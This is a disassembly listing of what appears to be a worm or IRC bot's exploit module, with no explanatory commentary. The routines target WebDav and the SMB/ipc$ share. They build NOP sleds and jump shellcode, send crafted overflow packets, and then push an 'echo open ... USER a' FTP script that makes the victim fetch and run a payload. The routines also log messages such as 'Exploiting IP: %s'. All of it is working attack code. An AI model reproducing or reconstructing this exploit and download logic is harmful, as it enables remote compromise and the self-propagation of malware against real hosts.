rep stosd
mov eax, off_4310DC
push esi
push dword ptr [ebp-4]
mov dword ptr [eax], 54495551h
call dword_43A458 ; send
push dword ptr [ebp-4]
call dword_43A4D0 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-340h]
push 200h
push eax
call sub_416BCD
add esp, 14h
cmp [ebp+0D0h], ebx
jnz short loc_41514F
push ebx
push dword ptr [ebp+0CCh]
lea eax, [ebp-340h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
add esp, 14h
loc_41514F: ; CODE XREF: .text:00415130�j
lea eax, [ebp-340h]
push eax
call sub_401F0F
mov eax, [ebp+0C4h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_415170: ; CODE XREF: .text:004150CD�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415175 proc near ; CODE XREF: sub_4152B5+3F8�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call dword_43A434 ; inet_addr
mov [ebp+var_10], eax
xor eax, eax
mov ax, word_4319E0
push eax
call dword_43A514 ; ntohs
xor ebx, ebx
push ebx
push 1
push 2
mov [ebp+var_12], ax
call dword_43A3BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jnz short loc_4151CE
xor al, al
jmp loc_4152B0
; ---------------------------------------------------------------------------
loc_4151CE: ; CODE XREF: sub_415175+50�j
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4152A5
push ebx
mov edi, 400h
push edi
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_43A324 ; recv
push [ebp+arg_24]
lea eax, [ebp+arg_14]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
mov esi, 190h
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_1A4]
add esp, 14h
lea ecx, [eax+1]
loc_415223: ; CODE XREF: sub_415175+B3�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_415223
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4152A5
push 1F4h
call dword_422000 ; Sleep
push offset byte_42FD4C
push offset aS_4 ; "%s\r\n"
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_1A4]
add esp, 10h
lea edx, [eax+1]
loc_415271: ; CODE XREF: sub_415175+101�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_415271
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4152A5
push ebx
push edi
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_43A324 ; recv
mov bl, 1
loc_4152A5: ; CODE XREF: sub_415175+69�j
; sub_415175+CC�j ...
push [ebp+var_4]
call dword_43A4D0 ; closesocket
mov al, bl
loc_4152B0: ; CODE XREF: sub_415175+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_415175 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4152B5 proc near ; CODE XREF: .text:004157DC�p
; .text:004157FE�p
var_81DC = byte ptr -81DCh
var_8174 = byte ptr -8174h
var_6104 = byte ptr -6104h
var_6094 = byte ptr -6094h
var_55D0 = byte ptr -55D0h
var_402C = byte ptr -402Ch
var_402B = byte ptr -402Bh
var_2F98 = byte ptr -2F98h
var_24D4 = byte ptr -24D4h
var_24D3 = byte ptr -24D3h
var_24D0 = byte ptr -24D0h
var_2454 = byte ptr -2454h
var_1C84 = byte ptr -1C84h
var_17D9 = byte ptr -17D9h
var_14EC = byte ptr -14ECh
var_EAC = byte ptr -0EACh
var_8D0 = byte ptr -8D0h
var_830 = byte ptr -830h
var_6C8 = dword ptr -6C8h
var_6B8 = byte ptr -6B8h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_384 = byte ptr -384h
var_124 = dword ptr -124h
var_114 = byte ptr -114h
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_D0 = dword ptr 0D8h
arg_D4 = dword ptr 0DCh
push ebp
mov ebp, esp
mov eax, 81DCh
call sub_416B90
mov eax, dword_42BC34
push ebx
mov [ebp+var_C], eax
mov eax, dword_42BC38
push esi
mov [ebp+var_8], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_34]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_416975
add esp, 0Ch
xor eax, eax
loc_4152EC: ; CODE XREF: sub_4152B5+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_4152EC
push 18h
pop ecx
mov esi, offset dword_4315D8
lea edi, [ebp+var_AC]
lea eax, [ebp+var_34]
rep movsd
lea edx, [eax+1]
loc_41531B: ; CODE XREF: sub_4152B5+6B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41531B
sub eax, edx
mov ecx, eax
lea esi, [ebp+var_FC]
lea edi, [ebp+var_7C]
lea eax, [ebp+var_34]
rep movsw
lea ecx, [eax+1]
loc_415338: ; CODE XREF: sub_4152B5+88�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415338
sub eax, ecx
lea edi, [ebp+eax*2+var_7D]
mov esi, (offset aC_4+3)
movsd
movsd
lea eax, [ebp+var_34]
movsb
lea ecx, [eax+1]
loc_415353: ; CODE XREF: sub_4152B5+A3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415353
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
mov [ebp+var_A9], al
lea eax, [ebp+var_34]
lea ecx, [eax+1]
loc_41536F: ; CODE XREF: sub_4152B5+BF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41536F
sub eax, ecx
shl al, 1
add al, 9
mov [ebp+var_7F], al
xor eax, eax
mov ax, word_4319E0
push eax
call dword_43A514 ; ntohs
xor eax, 9999h
cmp [ebp+arg_D4], 0
mov word_4312D0, ax
mov eax, 90909090h
jz loc_415481
mov ecx, 36Bh
lea edi, [ebp+var_EAC]
rep stosd
mov eax, [ebp+arg_D4]
imul eax, 3Ch
mov edx, dword_431A20[eax]
mov eax, offset loc_431220
mov ecx, eax
mov [ebp+var_6C8], edx
lea esi, [ecx+1]
loc_4153D7: ; CODE XREF: sub_4152B5+127�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4153D7
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp+var_6B8]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov [ebp+var_394], 6EB06EBh
mov [ebp+var_390], edx
lea esi, [ecx+1]
loc_41540B: ; CODE XREF: sub_4152B5+15B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_41540B
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_384]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_41542C: ; CODE XREF: sub_4152B5+193�j
mov cl, [ebp+eax+var_EAC]
and [ebp+eax*2+var_402B], 0
mov [ebp+eax*2+var_402C], cl
inc eax
cmp eax, 0DACh
jl short loc_41542C
and [ebp+var_24D4], 0
and [ebp+var_24D3], 0
mov edx, 714h
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_81DC]
rep stosd
stosw
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_6104]
rep stosd
stosw
jmp short loc_4154E8
; ---------------------------------------------------------------------------
loc_415481: ; CODE XREF: sub_4152B5+F0�j
mov ecx, 1F4h
lea edi, [ebp+var_8D0]
rep stosd
mov eax, offset loc_431220
mov ecx, eax
lea esi, [ecx+1]
loc_415498: ; CODE XREF: sub_4152B5+1E8�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_415498
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_830]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C]
rep movsb
lea ecx, [eax+1]
loc_4154BD: ; CODE XREF: sub_4152B5+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4154BD
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp+var_C]
lea edi, [ebp+var_114]
rep movsd
mov ecx, eax
mov eax, dword_431A20
and ecx, 3
rep movsb
mov [ebp+var_124], eax
loc_4154E8: ; CODE XREF: sub_4152B5+1CA�j
mov esi, [ebp+arg_D0]
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp+var_24D0]
rep stosd
stosb
movsx eax, [ebp+var_1]
push 0
add eax, 4
push eax
lea eax, [ebp+var_AC]
push eax
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_415525
loc_41551E: ; CODE XREF: sub_4152B5+29A�j
; sub_4152B5+2C1�j ...
xor al, al
jmp loc_4156BD
; ---------------------------------------------------------------------------
loc_415525: ; CODE XREF: sub_4152B5+267�j
push 0
mov ebx, 640h
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43A324 ; recv
xor edi, edi
push edi
push 68h
push offset dword_431640
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41551E
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43A324 ; recv
push edi
push 0A0h
push offset dword_4316B0
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41551E
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43A324 ; recv
cmp [ebp+arg_D4], edi
jz loc_415635
push 1Ah
pop ecx
mov esi, offset dword_431870
lea edi, [ebp+var_81DC]
rep movsd
mov ecx, 6D6h
lea esi, [ebp+var_402C]
lea edi, [ebp+var_8174]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_4318E0
lea edi, [ebp+var_6104]
rep movsd
mov ecx, 297h
lea esi, [ebp+var_2F98]
lea edi, [ebp+var_6094]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_431958
lea edi, [ebp+var_55D0]
rep movsd
xor esi, esi
push esi
push 10FCh
lea eax, [ebp+var_81DC]
push eax
push [ebp+arg_D0]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_41551E
push esi
push ebx
lea eax, [ebp+var_14EC]
push eax
push [ebp+arg_D0]
call dword_43A324 ; recv
push esi
push 0FDCh
lea eax, [ebp+var_6104]
jmp short loc_41567C
; ---------------------------------------------------------------------------
loc_415635: ; CODE XREF: sub_4152B5+2D9�j
push 1Fh
pop ecx
mov esi, offset dword_431758
lea edi, [ebp+var_24D0]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp+var_8D0]
lea edi, [ebp+var_2454]
rep movsd
pop ecx
mov esi, offset off_4317D8
lea edi, [ebp+var_1C84]
push 0
rep movsd
and [ebp+var_17D9], 0
push 0CF8h
lea eax, [ebp+var_24D0]
loc_41567C: ; CODE XREF: sub_4152B5+37E�j
push eax
push [ebp+arg_D0]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_41551E
push 12Ch
call dword_422000 ; Sleep
sub esp, 0D0h
push 34h
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_415175
add esp, 0D0h
test al, al
setnz al
loc_4156BD: ; CODE XREF: sub_4152B5+26B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4152B5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp-14h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
xor esi, esi
push eax
mov [ebp-4], esi
mov word ptr [ebp-14h], 2
call dword_43A434 ; inet_addr
push dword ptr [ebp+0BCh]
mov [ebp-10h], eax
call dword_43A514 ; ntohs
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_43A3BC ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jz loc_4157BE
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_43A36C ; connect
cmp eax, edi
jz loc_4157B7
push esi
push 89h
push offset dword_4313B8
push ebx
call dword_43A458 ; send
cmp eax, edi
jz short loc_4157B7
push esi
mov esi, 640h
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43A324 ; recv
push 0
push 0A8h
push offset dword_431448
push ebx
call dword_43A458 ; send
cmp eax, edi
jz short loc_4157B7
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43A324 ; recv
push 0
push 0DEh
push offset dword_4314F8
push ebx
call dword_43A458 ; send
cmp eax, edi
jz short loc_4157B7
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43A324 ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_4157C9
dec eax
jz short loc_4157C5
loc_4157B7: ; CODE XREF: .text:00415727�j
; .text:00415741�j ...
push ebx
call dword_43A4D0 ; closesocket
loc_4157BE: ; CODE XREF: .text:00415712�j
xor eax, eax
jmp loc_415888
; ---------------------------------------------------------------------------
loc_4157C5: ; CODE XREF: .text:004157B5�j
push 0
jmp short loc_4157ED
; ---------------------------------------------------------------------------
loc_4157C9: ; CODE XREF: .text:004157B2�j
push 2
push ebx
sub esp, 0D0h
push 34h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_4152B5
add esp, 0D8h
test al, al
jnz short loc_41580D
push 1
loc_4157ED: ; CODE XREF: .text:004157C7�j
push ebx
sub esp, 0D0h
push 34h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_4152B5
add esp, 0D8h
test al, al
jz short loc_415814
loc_41580D: ; CODE XREF: .text:004157E9�j
mov dword ptr [ebp-4], 1
loc_415814: ; CODE XREF: .text:0041580B�j
push ebx
call dword_43A4D0 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_415885
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_416BCD
push 0
push dword ptr [ebp+0CCh]
lea eax, [ebp-214h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
lea eax, [ebp-214h]
push eax
call sub_401F0F
mov eax, [ebp+0C4h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
add esp, 2Ch
inc dword ptr [eax]
loc_415885: ; CODE XREF: .text:0041581F�j
xor eax, eax
inc eax
loc_415888: ; CODE XREF: .text:004157C0�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8590h
call sub_416B90
mov eax, dword_42BC34
push ebx
push esi
mov [ebp-0Ch], eax
mov eax, dword_42BC38
push edi
mov [ebp-8], eax
lea eax, [ebp+0Ch]
push 1
push eax
call sub_40402D
test eax, eax
pop ecx
pop ecx
jz loc_415E75
cmp eax, 1
jz loc_415E75
cmp eax, 3
jnz short loc_4158D6
and dword ptr [ebp-10h], 0
jmp short loc_4158EA
; ---------------------------------------------------------------------------
loc_4158D6: ; CODE XREF: .text:004158CE�j
call sub_416B31
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-10h], edx
loc_4158EA: ; CODE XREF: .text:004158D4�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-58h]
push 28h
push eax
call sub_416BCD
add esp, 10h
xor eax, eax
loc_415903: ; CODE XREF: .text:0041591A�j
mov cl, [ebp+eax-58h]
and byte ptr [ebp+eax*2-11Fh], 0
mov [ebp+eax*2-120h], cl
inc eax
cmp eax, 28h
jl short loc_415903
push 18h
pop ecx
mov esi, offset dword_431E90
lea edi, [ebp-0D0h]
lea eax, [ebp-58h]
rep movsd
lea edx, [eax+1]
loc_415932: ; CODE XREF: .text:00415937�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_415932
sub eax, edx
mov ecx, eax
lea esi, [ebp-120h]
lea edi, [ebp-0A0h]
lea eax, [ebp-58h]
rep movsw
lea ecx, [eax+1]
loc_415952: ; CODE XREF: .text:00415957�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415952
sub eax, ecx
lea edi, [ebp+eax*2-0A1h]
mov esi, (offset aC_5+3)
movsd
movsd
lea eax, [ebp-58h]
movsb
lea ecx, [eax+1]
loc_415970: ; CODE XREF: .text:00415975�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415970
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp-1], al
mov [ebp-0CDh], al
lea eax, [ebp-58h]
lea ecx, [eax+1]
loc_41598C: ; CODE XREF: .text:00415991�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41598C
sub eax, ecx
shl al, 1
add al, 9
push 135h
mov [ebp-0A3h], al
call dword_43A514 ; ntohs
mov ebx, [ebp-10h]
xor eax, 9999h
cmp ebx, 1
mov word_431B88, ax
jz short loc_415A37
cmp ebx, 2
jz short loc_415A37
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [ebp-12C4h]
rep stosd
mov eax, offset loc_431AD8
mov ecx, eax
lea esi, [ecx+1]
loc_4159DE: ; CODE XREF: .text:004159E3�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_4159DE
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-1224h]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-0Ch]
rep movsb
lea ecx, [eax+1]
loc_415A03: ; CODE XREF: .text:00415A08�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415A03
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp-0Ch]
lea edi, [ebp-0B08h]
rep movsd
mov ecx, eax
and ecx, 3
imul ebx, 3Ch
mov eax, dword_4322D0[ebx]
rep movsb
mov [ebp-0B18h], eax
jmp loc_415B09
; ---------------------------------------------------------------------------
loc_415A37: ; CODE XREF: .text:004159BB�j
; .text:004159C0�j
imul ebx, 3Ch
mov edx, dword_4322D0[ebx]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [ebp-18A0h]
rep stosd
mov eax, offset loc_431AD8
mov ecx, eax
mov [ebp-10BCh], edx
lea esi, [ecx+1]
loc_415A62: ; CODE XREF: .text:00415A67�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_415A62
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp-10ACh]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov dword ptr [ebp-0D88h], 6EB06EBh
mov [ebp-0D84h], edx
lea esi, [ecx+1]
loc_415A96: ; CODE XREF: .text:00415A9B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_415A96
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-0D78h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_415AB7: ; CODE XREF: .text:00415AD3�j
mov cl, [ebp+eax-18A0h]
and byte ptr [ebp+eax*2-43DFh], 0
mov [ebp+eax*2-43E0h], cl
inc eax
cmp eax, 0DACh
jl short loc_415AB7
and byte ptr [ebp-2888h], 0
and byte ptr [ebp-2887h], 0
mov edx, 714h
mov esi, 31313131h
mov ecx, edx
mov eax, esi
lea edi, [ebp-8590h]
rep stosd
stosw
mov ecx, edx
mov eax, esi
lea edi, [ebp-64B8h]
rep stosd
stosw
loc_415B09: ; CODE XREF: .text:00415A32�j
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp-2884h]
rep stosd
xor ebx, ebx
push ebx
push 1
push 2
stosb
call dword_43A3BC ; socket
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jz loc_415E77
push dword ptr [ebp+0BCh]
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-30h], 2
call dword_43A514 ; ntohs
mov [ebp-2Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A434 ; inet_addr
mov [ebp-2Ch], eax
push 10h
lea eax, [ebp-30h]
push eax
push esi
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push ebx
push 89h
push offset dword_431C70
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push ebx
mov ebx, 640h
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
xor edi, edi
push edi
push 0A8h
push offset dword_431D00
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
push edi
push 0DEh
push offset dword_431DB0
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
movsx eax, byte ptr [ebp-1]
push edi
add eax, 4
push eax
lea eax, [ebp-0D0h]
push eax
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
push edi
push 68h
push offset dword_431EF8
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
push edi
push 0A0h
push offset dword_431F68
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
cmp dword ptr [ebp-10h], 1
jz short loc_415CF2
cmp dword ptr [ebp-10h], 2
jz short loc_415CF2
push 1Fh
pop ecx
mov esi, offset dword_432010
lea edi, [ebp-2884h]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp-12C4h]
lea edi, [ebp-2808h]
rep movsd
pop ecx
push 0
push 0CF8h
lea eax, [ebp-2884h]
mov esi, offset off_432090
lea edi, [ebp-2038h]
push eax
push dword ptr [ebp-8]
rep movsd
and byte ptr [ebp-1B8Dh], 0
loc_415CDB: ; CODE XREF: .text:00415D8C�j
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz loc_415D91
loc_415CEA: ; CODE XREF: .text:00415DB5�j
push dword ptr [ebp-8]
jmp loc_415E6F
; ---------------------------------------------------------------------------
loc_415CF2: ; CODE XREF: .text:00415C88�j
; .text:00415C8E�j
push 1Ah
pop ecx
mov esi, offset dword_432128
lea edi, [ebp-8590h]
rep movsd
mov ecx, 6D6h
lea esi, [ebp-43E0h]
lea edi, [ebp-8528h]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_432198
lea edi, [ebp-64B8h]
rep movsd
mov ecx, 297h
lea esi, [ebp-334Ch]
lea edi, [ebp-6448h]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_432210
lea edi, [ebp-5984h]
rep movsd
mov esi, [ebp-8]
xor edi, edi
push edi
push 10FCh
lea eax, [ebp-8590h]
push eax
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E6E
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
push edi
push 0FDCh
lea eax, [ebp-64B8h]
push eax
push esi
jmp loc_415CDB
; ---------------------------------------------------------------------------
loc_415D91: ; CODE XREF: .text:00415CE4�j
push 0
push ebx
lea eax, [ebp-0AF0h]
push eax
push dword ptr [ebp-8]
call dword_43A324 ; recv
push 6
push 1
push 2
call dword_43A3BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_415CEA
xor eax, eax
lea edi, [ebp-20h]
stosd
stosd
stosd
stosd
push 135h
mov word ptr [ebp-20h], 2
call dword_43A514 ; ntohs
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A434 ; inet_addr
mov [ebp-1Ch], eax
push 10h
lea eax, [ebp-20h]
push eax
push esi
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_415DFD
push dword ptr [ebp-8]
jmp short loc_415E68
; ---------------------------------------------------------------------------
loc_415DFD: ; CODE XREF: .text:00415DF6�j
xor edi, edi
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A324 ; recv
test eax, eax
jle short loc_415E75
push 1F4h
call dword_422000 ; Sleep
push dword ptr [ebp+2Ch]
lea eax, [ebp+1Ch]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
lea eax, [ebp-2B0h]
push 190h
push eax
call sub_416BCD
lea eax, [ebp-2B0h]
add esp, 14h
lea edx, [eax+1]
loc_415E47: ; CODE XREF: .text:00415E4C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_415E47
push edi
sub eax, edx
push eax
lea eax, [ebp-2B0h]
push eax
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_415E7C
loc_415E68: ; CODE XREF: .text:00415DFB�j
call dword_43A4D0 ; closesocket
loc_415E6E: ; CODE XREF: .text:00415B73�j
; .text:00415B8E�j ...
push esi
loc_415E6F: ; CODE XREF: .text:00415CED�j
call dword_43A4D0 ; closesocket
loc_415E75: ; CODE XREF: .text:004158BC�j
; .text:004158C5�j ...
xor eax, eax
loc_415E77: ; CODE XREF: .text:00415B33�j
; .text:00415EFB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415E7C: ; CODE XREF: .text:00415E66�j
call dword_43A4D0 ; closesocket
push esi
call dword_43A4D0 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSTryingToXploi ; "[%s]: Trying to Xploit IP: %s."
lea eax, [ebp-4B0h]
push 200h
push eax
call sub_416BCD
add esp, 14h
cmp [ebp+0D0h], edi
jnz short loc_415EDA
push edi
push dword ptr [ebp+0CCh]
lea eax, [ebp-4B0h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
add esp, 14h
loc_415EDA: ; CODE XREF: .text:00415EBB�j
lea eax, [ebp-4B0h]
push eax
call sub_401F0F
mov eax, [ebp+0C4h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp loc_415E77
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F00 proc near ; CODE XREF: sub_416179+37�p
var_6F0 = byte ptr -6F0h
var_4E8 = byte ptr -4E8h
var_2E8 = byte ptr -2E8h
var_15D = byte ptr -15Dh
var_158 = byte ptr -158h
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_34 = byte ptr 3Ch
arg_C8 = dword ptr 0D0h
arg_D0 = dword ptr 0D8h
arg_D4 = dword ptr 0DCh
push ebp
mov ebp, esp
sub esp, 6F0h
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
push 8
pop ecx
xor ebx, ebx
push ebx
push [ebp+arg_0]
xor eax, eax
push [ebp+arg_4]
lea edi, [ebp+var_54]
rep stosd
lea eax, [ebp+var_54]
push eax
mov [ebp+var_40], esi
mov [ebp+var_50], 1
mov [ebp+var_44], ebx
mov [ebp+var_38], ebx
call dword_43A464
test eax, eax
jz short loc_415F4D
push 0Ah
call dword_422000 ; Sleep
jmp loc_416165
; ---------------------------------------------------------------------------
loc_415F4D: ; CODE XREF: sub_415F00+3E�j
push 190h
lea eax, [ebp+var_2E8]
push eax
push 0FFFFFFFFh
push esi
